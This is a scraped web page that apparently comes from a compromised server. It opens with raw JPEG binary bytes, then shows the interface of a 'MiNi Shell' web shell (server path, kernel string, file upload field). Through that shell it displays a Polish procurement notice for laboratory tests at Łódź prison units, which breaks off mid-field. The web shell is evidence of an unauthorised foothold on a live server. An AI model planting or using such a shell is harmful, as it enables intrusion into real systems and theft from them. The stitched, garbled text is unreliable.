JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230120/0004921301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonywanie badań laboratoryjnych na potrzeby Jednostek organizacyjnych Okręgowego Inspektoratu Służby Więziennej w Łodzi </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KARNY NR 1 W ŁODZI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320064</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Beskidzka 54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">91-612</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_lodz_1@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonywanie badań laboratoryjnych na potrzeby Jednostek organizacyjnych Okręgowego Inspektoratu Służby Więziennej w Łodzi </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e128e584-98cb-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00049213</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00039075/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Wykonywanie badań laboratoryjnych na potrzeby Jednostek Organizacyjnych Okręgowego Inspektoratu Służby Więziennej w Łodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e128e584-98cb-11ed-94da-6ae0fe5e7159 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która<br/>jest dostępna pod adresem https://ezamowienia.gov.pl.  Korzystanie z Platformy e-Zamówienia jest bezpłatne.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-e128e584-98cb-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Dyrektor ZK Nr 1 w Łodzi z siedzibą w Łodzi, ul. Beskidzka 54, kod: 91-612, email:<br/>zk_lodz_1@sw.gov.pl, tel. 42 675 04 15;<br/>􀀀 administrator wyznaczył inspektora ochrony danych osobowych. Dane kontaktowe inspektora ochrony danych: e-mail<br/>iod_zk1_lodz@sw.gov.pl, tel. 42 675 05 25.<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego DKW.2232.01.2023.MD Wykonywanie badań laboratoryjnych na potrzeby Jednostek Organizacyjnych Okręgowego Inspektoratu Służby Więziennej w Łodzi, prowadzonym w trybie przetargu podstawowego bez negocjacji;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019r. – Prawo zamówień publicznych ( t.j. Dz. U. z 2021 r. poz. 1129 z<br/>późn. zm.), dalej „ustawa Pzp”;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">posiada Pani/Pan:<br/>• na podstawie art. 15 RODO prawo żądania dostępu do dodanych osobowych Pani/Pana dotyczących; W przypadku wykonanie<br/>obowiązków, o których mowa w art. 15 ust. 1-3 RODO, zamawiający może żądać od osoby, której dane dotyczą, wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania lub<br/>zakończonego postępowania o udzielenie zamówienia publicznego.<br/>• na podstawie art. 16 RODO prawo żądania sprostowania lub uzupełnienia Pani/Pana danych osobowych. Skorzystanie przez<br/>osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może naruszać<br/>integralności protokołu postępowania o udzielenie zamówienia oraz jego załączników jak i nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>• na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy prawa;<br/>nie przysługuje Pani/Panu:<br/>• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych<br/>• prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKW.2232.01.2023.MD</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">9</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 – Badania Laboratoryjne dla Aresztu Śledczego w Łodzi, ul. Smutna 21, 91-729 Łódź; NIP: 726-155-77-39, </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 35130,85 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 – Badania Laboratoryjne dla Zakładu Karnego Nr 1 w Łodzi, ul. Beskidzka 54, 91-612 Łódź; NIP: 728-108-66-51, waraz z Oddziałem Zewnętrznymn w Łodzi ul. Kraszewskiego 1/5 93-161 Łódź; NIP: 728-108-66-51 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 131409,78 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 – Badania Laboratoryjne dla Aresztu Śledczego w Piotrkowie Trybunalskim, ul. Wronia 76/90, 97-300 Piotrków Trybunalski; NIP: 771-102-92-14, </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 71932,70 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71900000-7 - Usługi laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich znaczeniem:<br/><br/><br/>Nr<br/>Kryteria<br/>Waga kryterium<br/>1.<br/>Cena<br/>60 %<br/>2.<br/>Kryterium czas wykonania badania <br/>40 %<br/>Kryterium: cena - waga kryterium 60%, zostanie wyliczony na podstawie następującego wzoru:<br/><br/> najniższa cena brutto spośród oferowanych<br/>A = ----------------------------------------------------------- x 60<br/> cena brutto oferty badanej<br/><br/>23.2. Kryterium: czas wykonania badania - 40%, które zostanie wyliczone na podstawie następującego zestawienia i wzoru:<br/><br/>23.2.1 W poszczególnych częściach przetargowych 1-9 występują określone badania, które będą oceniane pod względem zaproponowanego czasu realizacji tych określonych badań. W formularzu cenowym dotyczącym danej części w stosunku do tych badań pozostawiono puste miejsca, w miejscu wskazanym na termin ich realizacji. Wykonawca ubiegając się o realizację danej części musi zaproponować termin realizacji tych wskazanych badań od 1 do 3 dni roboczych – termin liczony jest od dnia następującego po dniu odbioru materiału do wykonania badania tj. w biegu terminu nie uwzględnia się dnia w którym odebrano materiał do badania. Zrealizowanie badania w terminie oznacza wykonanie badania i umieszczenie wyników badania online (§2 ust.7 projektu umowy). Termin maksymalny realizacji tych określonych badań wynosi 3 dni robocze. <br/>23.2.2 Wykonawca za poszczególne badania otrzyma:<br/>40 pkt. - zaproponowany czas realizacji badania –1 dzień roboczy <br/>20 pkt. - zaproponowany czas realizacji badania –2 dni robocze <br/>0 pkt. - zaproponowany czas realizacji badania - 3 dni robocze.<br/><br/>23.2.3. Następnie nastąpi przeliczenie według wzoru:<br/><br/> suma punktów przyznana za poszczególne badania, co do których pozostawiono puste miejsca w formularzu cenowym na daną część zgodnie z zaproponowanym czasem realizacji badania <br/>B = ---------------------------------------------------------------------------------------------------------------------------<br/> liczba badań w formularzu cenowym za daną część co do których pozostawiono puste miejsca celem ich wypełnienia celem wskazania terminu badania. <br/><br/>B –ilość punktów przyznana w ramach niniejszego kryterium</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badania</span></h3> <h3 class="mb-0">4.3.6.) 